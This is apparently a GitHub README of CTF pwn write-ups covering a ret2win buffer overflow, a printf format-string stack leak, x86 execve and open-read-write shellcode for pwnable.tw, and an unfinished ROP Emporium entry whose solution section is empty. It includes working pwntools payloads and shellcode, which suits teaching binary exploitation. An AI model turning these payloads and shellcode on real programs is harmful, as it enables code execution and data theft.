Skip to content

Latest commit

 

History

History
478 lines (368 loc) · 25.9 KB

File metadata and controls

478 lines (368 loc) · 25.9 KB

List of Contents

Notes: Case Identification is about finding the bug, or which part of the program is vulnerable, while Solution section is the explanation about how to exploit the program based on the vulnerability found on case identification section.

HackTheBox

You know 0xDiablos

Keyword: Buffer Overflow, ret2win

Challenge URL: https://app.hackthebox.com/challenges/You%2520know%25200xDiablos

Case Identification

Let's check the binary information and its protection by using checksec

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments

Seems like all the security protection of the file is disabled. Since No Canary found and PIE is disabled, meaning that we can simply overflow the program using basic return2win technique.

First of all, we need to know the offset of the buffer until the overflow occured. Lets set a breakpoint on the main function and create an input just to try to overflow the program. I use cyclic 300 command from pwndbg for making the payload, and here is what i got when debugging with pwndbg.

alt

Based on the output above, the Instruction Pointer (EIP) is not pointing to an address, instead it's pointing to our input payload. In a computer system, EIP is a pointer that is responsible for storing the memory address of the instruction that will be executed next by the processor. If we gain control over the EIP then we can arbitrarily change the program flow.

Since the EIP is pointing to the string waab or 0x626161677 (in hex), we can also change this value to another memory address, which is where the flag is stored. There are 3 user-defined function in this program:

0x080491e2  flag
0x08049272  vuln
0x080492b1  main

Our goal is to get the flag from the flag function, which is never called somewhere in the code. But before we go deeper, let's analyze the disassembly of main function to understand the program flow. Here is the snippet:

    0x0804930b <main+90> :	call   0x8049070 <puts@plt>
    0x08049310 <main+95> :	add    esp,0x10
==> 0x08049313 <main+98> :	call   0x8049272 <vuln>
    0x08049318 <main+103>:	mov    eax,0x0
    0x0804931d <main+108>:	lea    esp,[ebp-0x8]

Here, we have main+98 which will call the vuln function before executing the next instruction. Let's step into that function to analyze further about the program.

    0x0804928a <+24>:	lea    eax,[ebp-0xb8]
    0x08049290 <+30>:	push   eax
==> 0x08049291 <+31>:	call   0x8049040 <gets@plt>
    0x08049296 <+36>:	add    esp,0x10
    0x08049299 <+39>:	sub    esp,0xc
    0x0804929c <+42>:	lea    eax,[ebp-0xb8]
    0x080492a2 <+48>:	push   eax
==> 0x080492a3 <+49>:	call   0x8049070 <puts@plt>
    0x080492a8 <+54>:	add    esp,0x10
    0x080492ab <+57>:	nop
    0x080492ac <+58>:	mov    ebx,DWORD PTR [ebp-0x4]
    0x080492af <+61>:	leave  
    0x080492b0 <+62>:	ret    

We found something interesting here. If you look closer, there is a vulnerable part of that function which allows the user to input an arbitrary payload. The gets function will continue to store characters past the end of the buffer. So it's dangerous to use the gets function because the program will be vulnerable to a buffer overflow attack.

In addition, there is also a puts function that will print the output based on your input. We can use this later to print out the flag.

Solution

Since we know that the gets function is vulnerable, we can start to exploit the program. Based on our first findings about EIP, the program will overflow when the buffer is greater than 188 characters long. This is proven by the image below.

alt

The next 4 bytes, starting from the 189th character of the payload, will go into the EIP register. We can manipulate these 4-byte characters so the EIP will point to and execute the memory address we want. This way, we should replace those 4-byte characters with the starting address of the flag function, which is 0x080491e2.

Don't forget about the Byte Ordering of this binary file. The endianness of this file is Least Significant Bit, so we must type the address in reverse order like this: \xe2\x91\x04\x08. Now let's try our first dummy payload. I use pwntools to do this. Here is the snippet:

p = process('./vuln')
gdb.attach(p, '''
    init-pwndbg
    break *0x080492af
    continue
''')
payload = b'a'*188 + b'\xe2\x91\x04\x08'
p.sendlineafter('0xDiablos:', payload)

Set a breakpoint on 0x080492af so we can analyze the value of the registers (especially EIP) just before we hit the return instruction of the vuln function

alt

Good. If you look closer at the image above, there is a tiny arrow down icon from vuln+62 to the flag address. This means our payload has successfully manipulated the return address to call the flag function. But even if you can bypass into the flag function, there is another problem. There are 2 comparisons as shown in the image below.

alt

Those comparisons most likely use AND operator so you must pass all the conditions in order to get the flag. The first condition (0x08049246) will compare the first argument with 0xdeadbeef, while the second condition (0x0804924f) will compare the second argument with 0xc0ded00d. If you are still not sure about what's going on, make sure you understand the program flow as shown in the image above.

Before continuing to make the exploit, remember that there is some paddings before we hit the return address. On the x86 architecture, padding generally consists of 8 bytes, whereas on the x64 architecture it consists of 16 bytes. You can check this article for more details.

Now let's make the final exploit to pass those conditions. Based on our findings so far, the final exploit will consists of:

  • dummy characters to fill 188 buffer
  • Memory address of the flag function
  • 8 bytes padding
  • 2x arguments to pass branch conditions (0xdeadbeef) and (0xc0ded00d) in reverse order (LSB)

solver

Execute the solver script and we got the flag. Here is the final script i used to solve this challenge.

< Scroll back to the top >

Racecar

Keyword: Format String Vulnerability

Challenge URL: https://app.hackthebox.com/challenges/racecar

Case Identification

This challenge gives us an executable file with all seurity protection enabled. There are many user-defined functions in disassembled code, but some of them are just printing out the menu or text message which is not too useful for solving the challenge.

alt

We just need to focus on the car_menu because user input occurs in this function. Based on this disassembled car_menu function, If the user wins the race, the program prompts the user to enter a message. It then attempts to open a file named "flag.txt" and reads its contents.

So our main goal is to trigger the program to prompt user input so we can input our payload there. But how can we even win the race if the outcome is determined by random numbers..

if (((iVar1 == 1) && (iVar2 < iVar3)) || ((iVar1 == 2 && (iVar3 < iVar2)))) {
    printf("%s\n\n[+] You won the race!! You get 100 coins!\n",&DAT_00011540);
    coins = coins + 100;
    puVar5 = &DAT_00011538;
    printf("[+] Current coins: [%d]%s\n",coins,&DAT_00011538);
    printf("\n[!] Do you have anything to say to the press after your big victory?\n> %s",
            &DAT_000119de);
    __format = (char *)malloc(0x171);
    __stream = fopen("flag.txt","r");
    if (__stream == (FILE *)0x0) {
        printf("%s[-] Could not open flag.txt. Please contact the creator.\n",&DAT_00011548,puVar5);
                    /* WARNING: Subroutine does not return */
        exit(0x69);
    }
    fgets(local_3c,0x2c,__stream);
    read(0,__format,0x170);
    puts(
        "\n\x1b[3mThe Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: \x1b[0m"
        );
    printf(__format);
}
else if (((iVar1 == 1) && (iVar3 < iVar2)) || ((iVar1 == 2 && (iVar2 < iVar3)))) {
    printf("%s\n\n[-] You lost the race and all your coins!\n",&DAT_00011548);
    coins = 0;
    printf("[+] Current coins: [%d]%s\n",0,&DAT_00011538);
}

The program determines the winner based on randomly generated numbers, but we can actually increase our chance to win the game. Here is how it works:

  1. When you choose car option 1 and select the circuit race (option 2), the relevant code block is executed:
    if (((iVar1 == 1) && (iVar2 == 2)) || ((iVar1 == 2 && (iVar2 == 2)))) {
        iVar2 = rand();
        iVar2 = iVar2 % 10;
        iVar3 = rand();
        iVar3 = iVar3 % 100;
    }
    • In this case, iVar2 (your car number) is generated using rand() % 10, which results in a number between 0 and 9. On the other hand, iVar3 (the opponent's car number) is generated using rand() % 100, which results in a number between 0 and 99.
    • Since your car number (iVar2) is always less than 10 and the opponent's car number (iVar3) is between 0 and 99, the condition iVar2 < iVar3 is highly likely to be satisfied, resulting in winning the race.
  2. When you choose car (option 2) and select the highway battle (option 1), the relevant code block is executed:
     else if (((iVar1 == 1) && (iVar2 == 1)) || ((iVar1 == 2 && (iVar2 == 1)))) {
         iVar2 = rand();
         iVar2 = iVar2 % 100;
         iVar3 = rand();
         iVar3 = iVar3 % 10;
     }
    • In this case, iVar2 (your car number) is generated using rand() % 100, which results in a number between 0 and 99. On the other hand, iVar3 (the opponent's car number) is generated using rand() % 10, which results in a number between 0 and 9.

So for summarize, we can win the race if we choose either car option 1 and circuit race (option 2) OR car option 2 and highway battle (option 1). Great, we have successfully triggered user input. Now it's time to figure out how to leverage this user input to exploit the program.

Solution

The main vulnerability in this program is a format string vulnerability. It occurs in the car_menu function after you win the race. Here's the relevant code:

__format = (char *)malloc(0x171);
__stream = fopen("flag.txt","r");
if (__stream == (FILE *)0x0) {
  printf("%s[-] Could not open flag.txt. Please contact the creator.\n",&DAT_00011548,puVar5);
  exit(0x69);
}
fgets(local_3c,0x2c,__stream);
read(0,__format,0x170);
puts("\n\x1b[3mThe Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: \x1b[0m");
printf(__format);

The vulnerability lies in the last line: printf(__format). Here, the program is directly passing user input (__format) to printf without any format specifier. This allows an attacker to use format specifiers to read or write memory. Using %x or %p specifiers, you can leak values from the stack. Now the question is, what needs to be leaked?

In the car_menu function, we see this code:

char local_3c [44];
...
fgets(local_3c,0x2c,__stream);

local_3c is a local array of 44 bytes, declared within the function. Local variables are always stored on the stack. The fgets function reads up to 44 bytes from the flag file into this local array. This way, we can leak the flag out of the stack. We can just input multiple %p to exploit the program.

Stack layout visualization of car_menu function would look something similar like this:

alt

The stack grows upwards in memory. When a function is called, new data is pushed onto the stack at lower addresses. The printf function expects arguments for each format specifier in the format string. If there aren't enough arguments, printf will still try to read values from the stack for each specifier.

When you call printf(user_input) instead of printf("%s", user_input), you're allowing the user to control the format string. This means the user can include format specifiers that printf will try to interpret.

alt

printf starts reading from where it expects the first argument to be. In this case, it's likely to start at the __format pointer address. Since we're not providing actual arguments to match the format specifiers, printf keeps reading and moving down the stack (that's why the chall name is racecar :').

Each %p causes printf to read the next 4 bytes and move to the next word in memory. Since local_3c (containing the flag) is a local variable, it's on the stack, making it accessible via this method. This process continues for as many %p specifiers as you provide, potentially reading through the entire stack frame.

The key point is that each %p moves the read position 4 bytes down in memory. So if your input is %p %p %p %p %p %p, you might see output like: 0x62ab0200 0x170 0x60e76dfa 0x2d 0x7 0x26. You can add fake flag file which contains AAAABBBB characters so it can be easier to spot where the flag is.

alt

Here is the solver script that i used to implement this solution and solve the challenge.

< Scroll back to the top >

Pwnable

Start

Keyword: System Call, Shellcode

Challenge URL: https://pwnable.tw/challenge/#1

Case Identification

When you try to disassemble the the binary file, it doesn't have a main function which is commonly used in many C programs.

Non-debugging symbols:
0x08048060  _start
0x0804809d  _exit
0x080490a3  __bss_start
0x080490a3  _edata
0x080490a4  _end

In a standard C program, _start is provided by the C runtime and it sets up the environment before calling main. When there is no main symbol in the program, _start becomes the direct entry point for the operating system. It's common to use _start as the entry point when writing pure assembly.

So let's start by analyzing the _start symbol.

alt

In general, here is the use of some registers in this challenge for making syscall (x86 assembly):

  1. al (lower 8 bits of eax): stores syscall number. in x86 assembly 4 is for write and 3 is for read
  2. bl (lower 8 bits of ebx): stores file descriptor. in x86 assembly, 0 for stdin and 1 for stdout.
  3. dl (lower 8 bits of edx): length of the buffer in bytes

If you are still confused about those registers, make sure you have read the following repository for more explanation.

Based on the image above, the program pushes the string "Let's start the CTF:" onto the stack (20 bytes) in reverse order. It then writes those 20-byte string to stdout. After writing this string, the program doesn't adjust the stack pointer (there's no add esp, X instruction before the read).

The read syscall then starts writing data to the stack at the same position where the original string was stored. This means that any input beyond 20 bytes will start overwriting the stack frame.

Solution

The vulnerability occurs because the read operation can accept up to 60 bytes, but the available buffer space is only 20 bytes. Any input beyond 20 bytes will overwrite stack memory which can be used for leveraging our attack to control EIP register. But since there are no functions that potentially stores flag, so our main goal is to spawn interactive shell by crafting shellcode.

# 1st payload
payload = b"A"*20
payload += p32(0x08048087)
p.send(payload)

esp = unpack(p.read()[:4])
info("Leaked Address: " + hex(esp))

The first payload will be created to leak the stack pointer (ESP) value. When the function returns, it will jumps to mov ecx, esp instruction in address 0x08048087. Since we go back to the write syscall, the program continues to write the value of ECX (containing ESP) to stdout.

In short, the first payload allows the exploit to determine the current stack address which is essential for accurately placing the shellcode in the next stage. This leaked address is then used to calculate where to place the actual shellcode. It ensures that the second payload can accurately jump to the shellcode.

# 2nd payload
shellcode = asm(
    """
    xor ecx, ecx
    mul ecx
    push ecx
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    mov al, 11
    int 0x80
    """
)

payload = b"A"*20
payload += p32(esp+20)
payload += shellcode

For the second payload, we also need to add 20 bytes characters to reach the return address. But instead of returning to the original address, it returns to esp+20 which points to the beginning of the shellcode. esp+20 is calculated to point just after 20 byte characters and the 4-byte return address overwrite.

Why do we need to return to esp+20?

  • esp is the leaked stack address from the first stage.
  • '+20' is an offset to point past the buffer and overwritten return address.
  • This new address will point to the start of the shellcode in memory.

The 20 in esp+20 is crucial because it accounts for the exact size of the buffer plus the size of the return address, ensuring the jump lands at the start of the shellcode. Here is the final script to solve the challenge.

< Scroll back to the top >

ORW

Keyword: System Call, Shellcode

Challenge URL: https://pwnable.tw/challenge/#2

Case Identification

alt The goal of this challenge is to read a flag file located at /home/orw/flag on the server, but with restrictions on which system calls can be used. There are only three syscalls allowed for this challenge: open, read, and write.

Let's examine the disassembled main function of the binary executable file. Here is the full disassembled main , and here is the snippet:

0x08048566 <+30>:	call   0x8048380 <printf@plt>
0x0804856b <+35>:	add    esp,0x10
0x0804856e <+38>:	sub    esp,0x4
0x08048571 <+41>:	push   0xc8
0x08048576 <+46>:	push   0x804a060
0x0804857b <+51>:	push   0x0
0x0804857d <+53>:	call   0x8048370 <read@plt>
0x08048582 <+58>:	add    esp,0x10
0x08048585 <+61>:	mov    eax,0x804a060
0x0804858a <+66>:	call   eax
0x0804858c <+68>:	mov    eax,0x0
0x08048591 <+73>:	mov    ecx,DWORD PTR [ebp-0x4]
0x08048594 <+76>:	leave  
0x08048595 <+77>:	lea    esp,[ecx-0x4]
0x08048598 <+80>:	ret    
  • First, those instructions set up and call the read function.
  • 0xc8 (200 in decimal) is pushed onto the stack, which is the maximum number of bytes to read.
  • 0x804a060 is pushed onto the stack. This is the address of the buffer where the input will be stored.
  • 0x0 (file descriptor for stdin) is pushed onto the stack.
  • The read function is then called, which reads up to 200 bytes from stdin into the buffer at 0x804a060.
0x08048585 <+61>:	mov    eax,0x804a060
0x0804858a <+66>:	call   eax

The key vulnerability is the call eax instruction at 0x0804858a. This instruction will execute whatever code is in the buffer at 0x804a060, which is filled with user input. This is where the vulnerability lies. The program is taking the user's input, which was just read into the buffer at 0x804a060, and executing it directly as code.

Solution

Tap here for the solver script.

Since our input will directly executed as code, we just need to put open, read, and write syscall in order to get the flag. Lets start by the open syscall in x86 assembly.

xor eax, eax
push eax
add eax, 5
push 0x67616C66
push 0x2f77726f
push 0x2f656d6f
push 0x682f2f2f
mov ebx, esp
mov edx, 0
mov ecx, 0
int 0x80

On x86 assembly, the open syscall is used to open a file or create a new one. The open syscall reads the string from where ebx points (we set ebx to point to the start of our string on the stack) and keeps reading until it hits the null terminator. You can refer to this article for more detail. The C-equivalent code of the open syscall is:

int open(const char *pathname, int flags, mode_t mode)

In assembly, you set up the syscall like this:

  • eax: Syscall number (5 for open)
  • ebx: Pointer to the null-terminated string of the pathname
  • ecx: Flags (e.g., O_RDONLY, O_WRONLY, O_RDWR)
  • edx: Mode (permissions, only used when creating a new file)

Actually, I have been stuck for hours working on open syscall. This is because at first I thought that the first three instructions of the payload is equals to mov eax, 5, so i can just replace those 3 instructions with mov eax, 5. Those ways are the same for storing 5 into the eax register, but it's actually wrong.

xor eax, eax is the preferred way because it doesn't introduce null bytes which is important for crafting shellcode. On the other hand, mov eax, 5 translates to \xb8\x05\x00\x00\x00 in machine code, which contains null bytes. In shellcode, we often need to avoid null bytes (0x00) because they can terminate strings.

Null terminator is a byte with the value 0 that marks the end of a string. It tells the system "the string ends here". When you pass a string to a syscall, it needs to know where the string ends. It keeps reading memory until it hits a null byte.

The push eax after xor eax, eax is crucial. It pushes the value in eax (which is 0) onto the stack, which serves as the null terminator for the filename string that will be constructed next.

Imagine if we didn't have the null terminator, The open syscall might try to open a file with a much longer, incorrect name, leading to errors or unexpected behavior. The push eax (when eax is 0) is indeed used for terminating the name of the file we're going to open.

alt

Stack operations (push) and register operations (add eax, 5) are independent. The add eax, 5 instruction is part of syscall preparation, not filename construction. The stack grows upwards and the program executes from top to the bottom (The last item pushed is at the lowest address). Pushing characters in reverse order creates the correct string when read from low to high addresses. Remember that the file is Least Significant Byte so the bytes order is also reversed as well.

/* Read Syscall */  
mov eax, 3
mov ecx, ebx
mov ebx, eax
mov edx, 38
int 0x80

/* Write Syscall */
mov eax, 4
mov ebx, 1
int 0x80

The next syscall is about read and write. It's much readable than the previous one. The key point of both syscall is about file descriptor. If you ever wondering like this:

Why is the fd set to 3 instead of 0? i thought that read syscall is about reading input so i would use 0 for stdin. But why is it 3?

The reason is related to how file descriptors are assigned in Unix-like systems

  • 0 is reserved for stdin (standard input)
  • 1 is reserved for stdout (standard output)
  • 2 is reserved for stderr (standard error)

When you open a new file with the open syscall, the kernel assigns the lowest available file descriptor number. Any subsequent files opened by a process get assigned the next available number, typically starting from 3, for the first file you open in a process.

We use 3 because we want to read from the file we just opened, not from stdin. If we used 0, we'd be reading from stdin (keyboard input) instead of our flag file. In our exploit, we're specifically trying to read the contents of the flag file we just opened, not standard input. That's why we use the file descriptor returned by open (which is 3) instead of 0.

Here is the solver script that i use to complete this challenge.

< Scroll back to the top >

Rop Emporium

split (x86_64 architecture)

Keyword: Buffer Overflow, Return Oriented Programming

Challenge URL: https://ropemporium.com/challenge/split.html

Case Identification

A simple Return-Oriented Programming challenge which requires us to exploit buffer overflow vulnerability to execute a specific command that will read the flag. Here is the information of the file:

alt

There are 3 user-defined functions in the binary file: main, pwnme, and usefulFunction. The vulnerable part is in the pwnme() function, especially in this line: read(0,local_28,0x60). Here is the disassembled code of pwnme function:

void pwnme(void)
{
  undefined local_28 [32];
  
  memset(local_28,0,0x20);
  puts("Contriving a reason to ask user for data...");
  printf("> ");
  read(0,local_28,0x60);
  puts("Thank you!");
  return;
}

The buffer local_28 can only hold 32 bytes safely, but the read() function is allowed to write up to 96 bytes into this buffer. This means we can write 64 bytes more than the buffer can safely hold. The first 32 bytes fill the buffer as intended. The next 64 bytes will overflow the buffer and write into adjacent memory.

So our ideas is to craft input that's longer than 32 bytes. The extra bytes can be designed to change where the program goes next.

Solution

< Scroll back to the top >